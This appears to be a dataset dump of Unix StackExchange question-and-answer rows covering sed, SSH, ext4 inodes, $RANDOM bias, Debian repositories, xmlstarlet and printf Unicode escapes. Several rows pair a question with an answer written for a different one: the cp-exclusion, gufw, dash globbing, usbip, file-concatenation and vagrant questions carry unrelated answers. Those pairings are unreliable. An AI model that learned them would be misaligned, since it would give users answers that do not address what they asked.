source_id
int64 1
4.64M
| question
stringlengths 0
28.4k
| response
stringlengths 0
28.8k
| metadata
dict |
---|---|---|---|
526,018 | I have an old-ish Lenovo ideapad 110-15ISK with Fedora 30 installed (and a LUKS-encrypted SSD as storage). When I boot this machine: The "Lenovo" logo (actually just a text) is displayed, briefly. The boot manager screen is displayed with selectable kernels I select a kernel. The "Lenovo" logo is displayed, briefly. A password text entry widget is displayed with the "fedora(∫)" logo at the bottom of the screen. I enter the password to decrypt the LUKS-ified SSD. The boot process continues while the following is displayed: The "Lenovo" logo in the middle of the screen and The "fedora(∫)" logo at the bottom of the screen. Finally the KDE login screen takes over. Why does (7) happen? How is it possible to have the "Logo mashup" unless Fedora comes with a special selection of manufacturer logos to display? Because at that point, it is systemd that is in charge of the monitor (maybe via the framebuffer ). It is quite mysterious. | This is the result of Hans de Goede’s work on flicker-free boot in Fedora. Hans developed a new Plymouth theme which takes the firmware bootsplash and adds the Fedora logo to it, until boot finishes and the desktop environment takes over. This works because bootsplash logos are now exposed as an ACPI resource, which you can see in /sys/firmware/acpi/bgrt on systems which support this. See also the flicker-free FAQ . (This also explains how to modify the Plymouth theme so that the logo is still displayed along with the disk decryption password prompt.) | {
"source": [
"https://unix.stackexchange.com/questions/526018",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/52261/"
]
} |
526,064 | Here is my sample file user@linux:~$ cat file.txt
Line 1
Line 2
Line 3
Line 4
Line 5
user@linux:~$ I can print line 2-4 with grep -A2 'e 2' file.txt user@linux:~$ grep -A2 'e 2' file.txt
Line 2
Line 3
Line 4
user@linux:~$ I can also print out the line number as well with grep -n user@linux:~$ grep -nA2 'e 2' file.txt
2:Line 2
3-Line 3
4-Line 4
user@linux:~$ Also, the same thing can be accomplished with sed -n 2,4p file.txt user@linux:~$ sed -n 2,4p file.txt
Line 2
Line 3
Line 4
user@linux:~$ But I'm not sure how to print out the line number with sed Would it be possible to print out the line number with sed ? | AWK: awk 'NR==2,NR==4{print NR" "$0}' file.txt Double sed: sed '2,4!d;=' file.txt | sed 'N;s/\n/ /' glen jackmann 's sed and paste: sed '2,4!d;=' file.txt | paste -d: - - bart 's Perl version: perl -ne 'print "$. $_" if 2..4' file.txt cat and sed: cat -n file.txt | sed -n '2,4p' Also see this answer to a similar question. A bit of explanation: sed -n '2,4p' and sed '2,4!d' do the same thing: the first only prints lines between the second and the fourth (inclusive), the latter "deletes" every line except those. sed = prints the line number followed by a newline . See the manual . cat -n in the last example can be replaced by nl or grep -n '' . | {
"source": [
"https://unix.stackexchange.com/questions/526064",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/-1/"
]
} |
526,088 | I need to copy all files from one UNIX path to another within the same server. However, there are some .zip files I want to exclude while copying. How can I achieve this using the cp command options? | AWK: awk 'NR==2,NR==4{print NR" "$0}' file.txt Double sed: sed '2,4!d;=' file.txt | sed 'N;s/\n/ /' glen jackmann 's sed and paste: sed '2,4!d;=' file.txt | paste -d: - - bart 's Perl version: perl -ne 'print "$. $_" if 2..4' file.txt cat and sed: cat -n file.txt | sed -n '2,4p' Also see this answer to a similar question. A bit of explanation: sed -n '2,4p' and sed '2,4!d' do the same thing: the first only prints lines between the second and the fourth (inclusive), the latter "deletes" every line except those. sed = prints the line number followed by a newline . See the manual . cat -n in the last example can be replaced by nl or grep -n '' . | {
"source": [
"https://unix.stackexchange.com/questions/526088",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/358833/"
]
} |
526,527 | Long ago I generated a key pair using ssh-keygen and I used ssh-copy-id to enable login onto many development VMs without manually having to enter a password. I've also uploaded my public key on GitHub, GitLab and similar to authenticate to git repositories using git@ instead of https:// . How can I reinstall my Linux desktop and keep all these logins working? Is backing up and restoring ~/.ssh/ enough? | You need to back up your private keys, at the very least. They cannot be regenerated without having to replace your public key everywhere. These would normally have a name starting with id_ and no extension. The public keys can be regenerated with this command: ssh-keygen -y -f path/to/private/key . Your user configuration (a file called "config") could also be useful if you have set any non-defaults. All of these files would normally be in ~/.ssh, but check first! | {
"source": [
"https://unix.stackexchange.com/questions/526527",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/353460/"
]
} |
526,745 | I have two servers hosted in IDC. I can only use ports 20/21/22/23/3389/33101-33109 to establish connections between two servers. The IDC network device will block any other packets whose source or destination port is not in the 20/21/22/23/80/3389/33101-33109 list/range. But the source port of SSH is random. Using the command ssh username @ server -p remote_port one can easily specify a remote port. So is there an ssh command parameter or some other way to specify a local source port so I can use, for example, port 33101 to establish the SSH connection? My network topology is like this: | You can not specify the source port for ssh client. But you can use nc as a proxy, like this: ssh -p 33101 -o 'ProxyCommand nc -p 33101 %h %p' $SERVER_2 From How can i set the source port for SSH on unbuntu server? (on ServerFault) . | {
"source": [
"https://unix.stackexchange.com/questions/526745",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359405/"
]
} |
526,780 | Changes to /etc/hosts file seem to take effect immediately. I'm curious about the implementation. What magic is used to achieve this feature? Ask Ubuntu: After modifying /etc/hosts which service needs to be restarted? NetApp Support: How the /etc/hosts file works | The magic is opening the /etc/hosts file and reading it: strace -e trace=file wget -O /dev/null http://www.google.com http://www.facebook.com http://unix.stackexchange.com 2>&1 | grep hosts
open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 4
open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 5
open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 4 The getaddrinfo(3) function, which is the only standard name resolving interface, will just open and read /etc/hosts each time it is called to resolve a hostname. More sophisticated applications which are not using the standard getaddrinfo(3) , but are still somehow adding /etc/hosts to the mix (e.g. the dnsmasq DNS server) may be using inotify(7) to monitor changes to the /etc/hosts files and re-read it only if needed. Browsers and other such applications will not do that. They will open and read /etc/hosts each time they need to resolve a host name, even if they're not using libc's resolver directly, but are replicating its workings by other means. | {
"source": [
"https://unix.stackexchange.com/questions/526780",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359439/"
]
} |
527,628 | Linux Mint tells me, I only have 622 MB free disk space but there should be some gigabytes left. Looking at the partitions I am told that there are about ten gigabytes unused. I googled the problem and didn't find a solution but I did find the hint that I should check the disk usage with df -h . sudo df -h /home
Filesystem Size Used Avail Use% Mounted on
/dev/nvme0n1p8 189G 178G 622M 100% /home The output doesn't make any sense to me: The difference between Size and Used is 11GB, but it only shows 622M as Available. The SSD isn't old, so I wouldn't expect such a discrepancy. What should I do? | If the filesystem is ext4, there are reserved blocks, mostly to help handling and help avoid fragmentation and available only to the root user. For this setting, it can be changed live using tune2fs (not all settings can be handled like this when the filesystem is mounted): -m reserved-blocks-percentage Set the percentage of the filesystem which may only be allocated by privileged processes. Reserving some number of filesystem blocks
for use by privileged processes is done to avoid filesystem
fragmentation, and to allow system daemons, such as syslogd(8), to
continue to function correctly after non-privileged processes are
prevented from writing to the filesystem. Normally, the default
percentage of reserved blocks is 5%. So if you want to lower the reservation to 1% (~ 2GB) thus getting access to ~ 8GB of no more reserved space, you can do this: sudo tune2fs -m 1 /dev/nvme0n1p8 Note: the -m option actually accepts a decimal number as parameter. You can use -m 0.1 to reserve only about ~200MB (and access most of those previously unavailable 10GB). You can also use the -r option instead to reserve directly by blocks. It's probably not advised to have 0 reserved blocks. | {
"source": [
"https://unix.stackexchange.com/questions/527628",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/327870/"
]
} |
527,983 | What happens if the limit of 4 billion files was exceeded in an ext4 partition, with a transfer of 5 billion files for example? | Presumably, you'll be seeing some flavor of "No space left on device" error: # truncate -s 100M foobar.img
# mkfs.ext4 foobar.img
Creating filesystem with 102400 1k blocks and 25688 inodes
---> number of inodes determined at mkfs time ^^^^^
# mount -o loop foobar.img loop/
# touch loop/{1..25688}
touch: cannot touch 'loop/25678': No space left on device
touch: cannot touch 'loop/25679': No space left on device
touch: cannot touch 'loop/25680': No space left on device And in practice you hit this limit a lot sooner than "4 billion files". Check your filesystems with both df -h and df -i to find out how much space there is left. # df -h loop/
Filesystem Size Used Avail Use% Mounted on
/dev/loop0 93M 2.1M 84M 3% /dev/shm/loop
# df -i loop/
Filesystem Inodes IUsed IFree IUse% Mounted on
/dev/loop0 25688 25688 0 100% /dev/shm/loop In this example, if your files are not 4K size on the average, you run out of inode-space much sooner than storage-space. It's possible to specify another ratio ( mke2fs -N number-of-inodes or -i bytes-per-inode or -T usage-type as defined in /etc/mke2fs.conf ). | {
"source": [
"https://unix.stackexchange.com/questions/527983",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359833/"
]
} |
527,997 | I want to install gufw on my Fedora, but I do not know how to do that.
I tried to install with the dnf package manager command but it doesn't work and gets this output: No match for argument: gufw
Error: Unable to find a match So, I did an apt-get and again I got negative result: E: Couldn't find package gufw How can I successfully install gufw? I want to control each app's access to the internet, so is there any firewall app other than gufw ? | Presumably, you'll be seeing some flavor of "No space left on device" error: # truncate -s 100M foobar.img
# mkfs.ext4 foobar.img
Creating filesystem with 102400 1k blocks and 25688 inodes
---> number of inodes determined at mkfs time ^^^^^
# mount -o loop foobar.img loop/
# touch loop/{1..25688}
touch: cannot touch 'loop/25678': No space left on device
touch: cannot touch 'loop/25679': No space left on device
touch: cannot touch 'loop/25680': No space left on device And in practice you hit this limit a lot sooner than "4 billion files". Check your filesystems with both df -h and df -i to find out how much space there is left. # df -h loop/
Filesystem Size Used Avail Use% Mounted on
/dev/loop0 93M 2.1M 84M 3% /dev/shm/loop
# df -i loop/
Filesystem Inodes IUsed IFree IUse% Mounted on
/dev/loop0 25688 25688 0 100% /dev/shm/loop In this example, if your files are not 4K size on the average, you run out of inode-space much sooner than storage-space. It's possible to specify another ratio ( mke2fs -N number-of-inodes or -i bytes-per-inode or -T usage-type as defined in /etc/mke2fs.conf ). | {
"source": [
"https://unix.stackexchange.com/questions/527997",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359491/"
]
} |
528,009 | I have a job script which is not producing results, and one of my suspicions is that there are some files called which are missing, the relevant part of the job scripts looks like this: echo get_data
get_fms_data \
amip1 \
seaesf \
albedo \
lad \
topog \
ggrpsst \
mom4 \
/data0/home/rslat/GFDL/archive/edg/fms/river_routes_gt74Sto61S=river_destination_field \
/data0/home/rslat/GFDL/archive/fms/mom4/mom4p1/mom4p1a/mom4_ecosystem/preprocessing/rho0_profile.nc \
/data0/home/rslat/GFDL/archive/fms/mom4/mom4p0/mom4p0c/mom4_test8/preprocessing/fe_dep_ginoux_gregg_om3_bc.nc=Soluble_Fe_Flux_PI.nc \
/data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/cover_type_1860_g_ens=cover_type_field \
/data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/soil_color.nc \
/data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/biodata.nc \
/data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/ground_type.nc \
/data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/groundwater_residence.nc \
/data0/home/rslat/GFDL/archive/ms2/esm2.1/input/max_water.nc \
... As a first step, I want to copy all these paths into a text file and then check if they actually exist. Is there an easy way to do it? I looked in other questions but most of them refer to checking only one file and not from a file. Thank you! | Presumably, you'll be seeing some flavor of "No space left on device" error: # truncate -s 100M foobar.img
# mkfs.ext4 foobar.img
Creating filesystem with 102400 1k blocks and 25688 inodes
---> number of inodes determined at mkfs time ^^^^^
# mount -o loop foobar.img loop/
# touch loop/{1..25688}
touch: cannot touch 'loop/25678': No space left on device
touch: cannot touch 'loop/25679': No space left on device
touch: cannot touch 'loop/25680': No space left on device And in practice you hit this limit a lot sooner than "4 billion files". Check your filesystems with both df -h and df -i to find out how much space there is left. # df -h loop/
Filesystem Size Used Avail Use% Mounted on
/dev/loop0 93M 2.1M 84M 3% /dev/shm/loop
# df -i loop/
Filesystem Inodes IUsed IFree IUse% Mounted on
/dev/loop0 25688 25688 0 100% /dev/shm/loop In this example, if your files are not 4K size on the average, you run out of inode-space much sooner than storage-space. It's possible to specify another ratio ( mke2fs -N number-of-inodes or -i bytes-per-inode or -T usage-type as defined in /etc/mke2fs.conf ). | {
"source": [
"https://unix.stackexchange.com/questions/528009",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/356086/"
]
} |
528,343 | I read about RNGs on Wikipedia and $RANDOM function on TLDP but it doesn't really explain this result: $ max=$((6*3600))
$ for f in {1..100000}; do echo $(($RANDOM%max/3600)); done | sort | uniq -c
21787 0
22114 1
21933 2
12157 3
10938 4
11071 5 Why are the values above about 2x more inclined to be 0, 1, 2 than 3, 4, 5 but when I change the max modulo they're almost equally spread over all 10 values? $ max=$((9*3600))
$ for f in {1..100000}; do echo $(($RANDOM%max/3600)); done | sort | uniq -c
11940 0
11199 1
10898 2
10945 3
11239 4
10928 5
10875 6
10759 7
11217 8 | To expand on the topic of modulo bias, your formula is: max=$((6*3600))
$(($RANDOM%max/3600)) And in this formula, $RANDOM is a random value in the range 0-32767. RANDOM Each time this parameter is referenced, a random integer between
0 and 32767 is generated. It helps to visualize how this maps to possible values: 0 = 0-3599
1 = 3600-7199
2 = 7200-10799
3 = 10800-14399
4 = 14400-17999
5 = 18000-21599
0 = 21600-25199
1 = 25200-28799
2 = 28800-32399
3 = 32400-32767 So in your formula, the probability for 0, 1, 2 is twice that of 4, 5. And probability of 3 is slightly higher than 4, 5 too. Hence your result with 0, 1, 2 as winners and 4, 5 as losers. When changing to 9*3600 , it turns out as: 0 = 0-3599
1 = 3600-7199
2 = 7200-10799
3 = 10800-14399
4 = 14400-17999
5 = 18000-21599
6 = 21600-25199
7 = 25200-28799
8 = 28800-32399
0 = 32400-32767 1-8 have the same probability, but there is still a slight bias for 0, and hence 0 was still the winner in your test with 100'000 iterations. To fix the modulo bias, you should first simplify the formula (if you only want 0-5 then the modulo is 6, not 3600 or even crazier number, no sense in that). This simplification alone will reduce your bias by a lot (32766 maps to 0, 32767 to 1 giving a tiny bias to those two numbers). To get rid of bias altogether, you need to re-roll, (for example) when $RANDOM is lower than 32768 % 6 (eliminate the states that do not map perfectly to available random range). max=6
for f in {1..100000}
do
r=$RANDOM
while [ $r -lt $((32768 % $max)) ]; do r=$RANDOM; done
echo $(($r%max))
done | sort | uniq -c | sort -n Test result: 16425 5
16515 1
16720 0
16769 2
16776 4
16795 3 The alternative would be using a different random source that does not have noticable bias (orders of magnitude larger than just 32768 possible values). But implementing a re-roll logic anyway doesn't hurt (even if it likely never comes to pass). | {
"source": [
"https://unix.stackexchange.com/questions/528343",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/82399/"
]
} |
528,361 | I'm working with a copy of Raspbian, installed with pi-gen . Pi-gen runs in a Docker container with a volume for the filesystem, running debootstrap and custom scripts inside a chroot to the volume. I'm running a shell inside the Raspbian filesystem using chroot and qemu-arm-static , but without Docker. I noticed that the mkinitramfs script was not working. I traced the problem back to dash , which the script is running in. For some reason dash is not expanding filename wildcards in commands: # echo /*
/*
# ls /
bin boot dev etc home lib media mnt opt proc root run sbin sys tmp usr var This happens in all folders inside the chroot and also in scripts .
This breaks a lot of stuff. However, wildcard expansion works normally in filesystems bind-mounted inside the chroot , such as /proc and /run . Also, path expansion using the same dash binary works inside a different chroot . I've already tried set +f and set +o noglob with no luck. The noglob option is definitely not on: # set -o
Current option settings
errexit off
noglob off
ignoreeof off
interactive on
monitor on
noexec off
stdin on
xtrace off
verbose off
vi off
emacs off
noclobber off
allexport off
notify off
nounset off
nolog off
debug off I'm running version 0.5.8-2.4 of the dash package from http://raspbian.raspberrypi.org/raspbian stretch/main armhf . The host machine is running Kali Linux 2019.1 with kernel 4.19.0-kali4-amd64 . Has anyone seen a similar problem before? What could I use as a workaround? Update: The following is the relevant part of the strace dump in a working chroot : read(0, "echo /*\n", 8192) = 8
openat(AT_FDCWD, "/", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
fstat(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
getdents(3, /* 11 entries */, 32768) = 264
getdents(3, /* 0 entries */, 32768) = 0
close(3) = 0
write(1, "/bin /dev /etc /lib /pls /proc /"..., 46) = 46 The same in the non-working chroot : read(0, "echo /*\n", 8192) = 8
openat(AT_FDCWD, "/", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3
fstat(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
getdents64(3, /* 20 entries */, 32768) = 488
close(3) = 0
write(1, "/*\n", 3) = 3 | To expand on the topic of modulo bias, your formula is: max=$((6*3600))
$(($RANDOM%max/3600)) And in this formula, $RANDOM is a random value in the range 0-32767. RANDOM Each time this parameter is referenced, a random integer between
0 and 32767 is generated. It helps to visualize how this maps to possible values: 0 = 0-3599
1 = 3600-7199
2 = 7200-10799
3 = 10800-14399
4 = 14400-17999
5 = 18000-21599
0 = 21600-25199
1 = 25200-28799
2 = 28800-32399
3 = 32400-32767 So in your formula, the probability for 0, 1, 2 is twice that of 4, 5. And probability of 3 is slightly higher than 4, 5 too. Hence your result with 0, 1, 2 as winners and 4, 5 as losers. When changing to 9*3600 , it turns out as: 0 = 0-3599
1 = 3600-7199
2 = 7200-10799
3 = 10800-14399
4 = 14400-17999
5 = 18000-21599
6 = 21600-25199
7 = 25200-28799
8 = 28800-32399
0 = 32400-32767 1-8 have the same probability, but there is still a slight bias for 0, and hence 0 was still the winner in your test with 100'000 iterations. To fix the modulo bias, you should first simplify the formula (if you only want 0-5 then the modulo is 6, not 3600 or even crazier number, no sense in that). This simplification alone will reduce your bias by a lot (32766 maps to 0, 32767 to 1 giving a tiny bias to those two numbers). To get rid of bias altogether, you need to re-roll, (for example) when $RANDOM is lower than 32768 % 6 (eliminate the states that do not map perfectly to available random range). max=6
for f in {1..100000}
do
r=$RANDOM
while [ $r -lt $((32768 % $max)) ]; do r=$RANDOM; done
echo $(($r%max))
done | sort | uniq -c | sort -n Test result: 16425 5
16515 1
16720 0
16769 2
16776 4
16795 3 The alternative would be using a different random source that does not have noticable bias (orders of magnitude larger than just 32768 possible values). But implementing a re-roll logic anyway doesn't hurt (even if it likely never comes to pass). | {
"source": [
"https://unix.stackexchange.com/questions/528361",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/360809/"
]
} |
528,751 | I cannot run apt-get update as I encounter the following error: # apt-get update
Hit:1 http://ftp.br.debian.org/debian testing InRelease
Ign:2 http://security.debian.org/debian-security testing/updates InRelease
Err:3 http://security.debian.org/debian-security testing/updates Release
404 Not Found [IP: 151.101.92.204 80]
Reading package lists... Done
E: The repository 'http://security.debian.org/debian-security testing/updates Release' no longer has a Release file.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details.
E: Repository 'http://ftp.br.debian.org/debian testing InRelease' changed its 'Codename' value from 'buster' to 'bullseye'
N: This must be accepted explicitly before updates for this repository can be applied. See apt-secure(8) manpage for details. So there are two error messages here: The repository no longer has a Release file, which is weird. I checked at http://security-cdn.debian.org/debian-security/zzz-dists/testing/updates/ ant it looks like the Release file is there. Am I looking in the wrong place or is there something else happening? The repository changed its name from buster to bullseye and that this "must be accepted explicitly" (I saw this once today; it wasn't there when I opened the question and it does not appear anymore). This isn't really surprising, but I didn't expect it to be a problem if I'm tracking the repository as testing instead of the release name. What can I do? APT is telling me to read the apt-secure(8) , but it either does not have the information I need or I cannot understand it. | Change testing/updates to testing-security in your sources.list to match http://security-cdn.debian.org/debian-security/dists/testing-security/ Then run apt update instead of apt-get update to interactively accept the various changes. According to this reddit post this repository name change was introduced in release 10. | {
"source": [
"https://unix.stackexchange.com/questions/528751",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/136742/"
]
} |
528,769 | I am looking to have a host start up and run usbip [Unit]
Description=USB-IP Binding
After=network-online.target
[Service]
ExecStartPre=/usr/sbin/usbipd -D
ExecStart=/usr/sbin/usbip bind --busid 1-1.5
ExecStop=/usr/sbin/usbip unbind --busid 1-1.5
Restart=on-failure
[Install]
WantedBy=default.target It appears to start correctly with out error, but when i go to the client and list the server it does not show that usbip running. Also does anyone know of a script to share all USB device via USBIP. Thank you for the help. | Change testing/updates to testing-security in your sources.list to match http://security-cdn.debian.org/debian-security/dists/testing-security/ Then run apt update instead of apt-get update to interactively accept the various changes. According to this reddit post this repository name change was introduced in release 10. | {
"source": [
"https://unix.stackexchange.com/questions/528769",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361175/"
]
} |
529,009 | I tried to upgrade my Debian System using apt , the repository is set to "testing" so I expected it to change to the next version "Bullseye" from "Buster" automatically but since "Buster" moved on I get: 404 Not Found [IP: 151.101.12.204 80] when running apt update . The security.debian.org address does not seem to have Release files, did the address change? E: The repository 'http://security.debian.org testing/updates Release' no longer has a Release file.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details. this are the relevant entries of my /etc/apt/sources.list : deb http://ftp.ch.debian.org/debian/ testing main contrib non-free
deb-src http://ftp.ch.debian.org/debian/ testing main contrib non-free
deb http://security.debian.org/ testing/updates main contrib non-free
deb-src http://security.debian.org/ testing/updates main contrib non-free
# jessie-updates, previously known as 'volatile'
deb http://ftp.ch.debian.org/debian/ testing-updates main contrib non-free
deb-src http://ftp.ch.debian.org/debian/ testing-updates main contrib non-free I checked man apt-secure but could not find or understand the relevant information. Update: I got two answers so far, both referring to the ofical debian.org page, but suggest a complete different solution. Can someone please explain, since I decided to not remove the security.debian.org entries, but changed the version-attribute format. | From https://wiki.debian.org/Status/Testing deb http://security.debian.org testing-security main contrib non-free
deb-src http://security.debian.org testing-security main contrib non-free The entries slightly changed after the latest release. Here is an announcement to debian-devel-announce : ... over the last years we had people getting confused over -updates (recommended updates) and /updates (security updates). Starting with Debian 11 "bullseye" we have therefore renamed the suite including the security updates to -security. An entry in sources.list should look like deb security.debian.org/debian-security bullseye-security main For previous releases the name will not change. | {
"source": [
"https://unix.stackexchange.com/questions/529009",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/240990/"
]
} |
529,012 | I am new to bash shell scripting, apologies if this was already asked. I have combinations of multiple files such as: USA.txt Florida.txt Miami.txt I would like to join those files and create a new file which contains everything such as: cat *.txt > USA_FLORIDA_MIAMI.txt In another case The thing is that some other time the files have a different prefix: Canada.txt Quebec.txt Montreal.txt so in this second case, the output will be CANADA_QUEBEC_MONTREAL.txt: cat *.txt > CANADA_QUEBEC_MONTREAL.txt and so on for all the combinations of other files In the first case scenario, USA.txt Florida.txt Miami.txt are the only .txt files present in the directory. In the second case, they will be replaced by Canada.txt Quebec.txt Montreal.txt so I would need to write a code which all the time combines the information of the prefix of all the .txt files present at that time in the directory and it adds it to the prefix of the output file. The variable here is the name of the Country, State and City. Any suggestion about any command which I could use?
thanks | From https://wiki.debian.org/Status/Testing deb http://security.debian.org testing-security main contrib non-free
deb-src http://security.debian.org testing-security main contrib non-free The entries slightly changed after the latest release. Here is an announcement to debian-devel-announce : ... over the last years we had people getting confused over -updates (recommended updates) and /updates (security updates). Starting with Debian 11 "bullseye" we have therefore renamed the suite including the security updates to -security. An entry in sources.list should look like deb security.debian.org/debian-security bullseye-security main For previous releases the name will not change. | {
"source": [
"https://unix.stackexchange.com/questions/529012",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361114/"
]
} |
529,379 | I have a bash script which simply docker pushes an image: docker push $CONTAINER_IMAGE:latest I want to loop for 3 times when this fails. How should I achieve this? | Use for-loop and && break : for n in {1..3}; do
docker push $CONTAINER_IMAGE:latest && break;
done break quits the loop, but only runs when docker push succeeded. If docker push fails, it will exit with error and the loop will continue. | {
"source": [
"https://unix.stackexchange.com/questions/529379",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/62249/"
]
} |
529,670 | Using Bash, File: <?xml version="1.0" encoding="UTF-8"?>
<blah>
<blah1 path="er" name="andy" remote="origin" branch="master" tag="true" />
<blah1 path="er/er1" name="Roger" remote="origin" branch="childbranch" tag="true" />
<blah1 path="er/er2" name="Steven" remote="origin" branch="master" tag="true" />
</blah> I have tried the following: grep -i 'name="andy" remote="origin" branch=".*\"' <filename> But it returns the whole line: <blah1 path="er" name="andy" remote="origin" branch="master" tag="true" /> I would like to match the line based on the following: name="andy" I just want it to return: master | Use an XML parser for parsing XML data. With xmlstarlet it just becomes an XPath exercise: $ branch=$(xmlstarlet sel -t -v '//blah1[@name="andy"]/@branch' file.xml)
$ echo $branch
master | {
"source": [
"https://unix.stackexchange.com/questions/529670",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361957/"
]
} |
529,679 | I have some non standard and standard filenames like the ones below . I need to get the count of files that are NOT standard.. Standard file names: XYZ ABC .txt, XYZ ABC .csv, *.msg Non standard file names: 989875.txt or myname.csv ; this has no bounds and can be anything.. The only good part is I know the standard one and i just need to do a NOT condition to simple find command. How can i do it. Not interested to do a file LOOP etc.. | Use an XML parser for parsing XML data. With xmlstarlet it just becomes an XPath exercise: $ branch=$(xmlstarlet sel -t -v '//blah1[@name="andy"]/@branch' file.xml)
$ echo $branch
master | {
"source": [
"https://unix.stackexchange.com/questions/529679",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/361571/"
]
} |
529,696 | Just now: $ vagrant plugin update
Updating installed plugins...
Fetching public_suffix-3.1.1.gem
Fetching vagrant-lxd-0.4.2.gem
Traceback (most recent call last):
19: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/bin/vagrant:182:in `<main>'
18: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/environment.rb:290:in `cli'
17: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/cli.rb:66:in `execute'
16: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/command/root.rb:66:in `execute'
15: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/command/update.rb:28:in `execute'
14: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/command/base.rb:14:in `action'
13: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/runner.rb:102:in `run'
12: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/util/busy.rb:19:in `busy'
11: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/runner.rb:102:in `block in run'
10: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/builder.rb:116:in `call'
9: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/warden.rb:50:in `call'
8: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/builtin/before_trigger.rb:23:in `call'
7: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/action/warden.rb:50:in `call'
6: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/plugins/commands/plugin/action/update_gems.rb:23:in `call'
5: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/plugin/manager.rb:228:in `update_plugins'
4: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/bundler.rb:242:in `clean'
3: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/bundler.rb:242:in `each'
2: from /opt/vagrant/embedded/gems/gems/vagrant-2.2.5/lib/vagrant/bundler.rb:251:in `block in clean'
1: from /usr/lib/ruby/2.6.0/rubygems/uninstaller.rb:162:in `uninstall_gem'
/usr/lib/ruby/2.6.0/rubygems/uninstaller.rb:264:in `remove': uninitialized constant Gem::RDoc (NameError) This or similar errors seem to happen every single time I update plugins in Vagrant. Is my system broken in some way? | Use an XML parser for parsing XML data. With xmlstarlet it just becomes an XPath exercise: $ branch=$(xmlstarlet sel -t -v '//blah1[@name="andy"]/@branch' file.xml)
$ echo $branch
master | {
"source": [
"https://unix.stackexchange.com/questions/529696",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/3645/"
]
} |
530,788 | I'm running Arch Linux with simple terminal using the Adobe Source Code Pro font. My locale is correctly set to LANG=en_US.UTF-8 . I want to print Unicode characters representing playing cards to my terminal. I'm using Wikipedia for reference . The Unicode characters for card suits work fine. For example, issuing $ printf "\u2660" prints a black heart to the screen. However, I'm having trouble with specific playing cards. Issuing $ printf "\u1F0A1" prints the symbol Ἂ1 instead of the ace of spades . What's going wrong? This problem persists across several terminals (urxvt, xterm, termite) and every font I've tried (DejaVu, Inconsolata). | help printf defers to printf(1) for the escape sequences interpreted, and the docs for GNU printf says: printf interprets two character syntaxes introduced in ISO C 99: \u for 16-bit Unicode (ISO/IEC 10646) characters, specified as four
hexadecimal digits hhhh , and \U for 32-bit Unicode characters,
specified as eight hexadecimal digits hhhhhhhh . printf outputs the
Unicode characters according to the LC_CTYPE locale. Unicode
characters in the ranges U+0000…U+009F, U+D800…U+DFFF cannot be
specified by this syntax, except for U+0024 ($), U+0040 (@), and
U+0060 (`). Something similar is specified in the Bash manual for ANSI C Quoting and echo : \uHHHH the Unicode (ISO/IEC 10646) character whose value is the hexadecimal
value HHHH (one to four hex digits) \UHHHHHHHH the Unicode (ISO/IEC 10646) character whose value is the hexadecimal
value HHHHHHHH (one to eight hex digits) In short: \u is not for 5 hex digits. It's \U : # printf "\u2660 \u1F0A1 \U1F0A1\n"
♠ Ἂ1 | {
"source": [
"https://unix.stackexchange.com/questions/530788",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/92703/"
]
} |
531,795 | How may I shorten this shell script? CODE="A"
if test "$CODE" = "A"
then
PN="com.tencent.ig"
elif test "$CODE" = "a"
then
PN="com.tencent.ig"
